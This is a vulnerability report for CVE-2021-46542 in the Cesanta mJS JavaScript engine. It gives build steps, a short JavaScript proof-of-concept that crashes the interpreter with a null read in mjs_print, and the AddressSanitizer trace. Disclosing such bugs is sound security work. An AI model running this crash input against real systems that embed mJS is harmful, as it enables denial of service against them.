Headline
CVE-2021-46542: SEGV src/mjs_builtin.c:18 in mjs_print · Issue #215 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_print at src/mjs_builtin.c. This vulnerability can lead to a Denial of Service (DoS).
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test case
function D(i) { print++i return [i]; } function A() { return D.apply(print(chr(D.apply(print(chr(0)), [i, 1, 2, 3]))), [i, 1, 2, 3]); } function JSEtest(i) { return A(i, 1, 2, 3); } JSEtest(89)[0] JSEtest(0.2)
Execution steps & Output
$ ./mjs/build/mjs poc.js \x00 null ASAN:DEADLYSIGNAL ================================================================= ==55629==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55789394d7f2 bp 0x000000000095 sp 0x7ffdc33bd878 T0) ==55629==The signal is caused by a READ memory access. ==55629==Hint: address points to the zero page. #0 0x55789394d7f1 in mjs_print src/mjs_builtin.c:18 #1 0x557893968244 in mjs_execute src/mjs_exec.c:853 #2 0x557893971a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x557893971a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x55789392e909 in main src/mjs_main.c:47 #5 0x7f7c0e673b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x55789392f449 in _start (/usr/local/bin/mjs+0xe449)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_builtin.c:18 in mjs_print ==55629==ABORTING
Credits: Found by OWL337 team.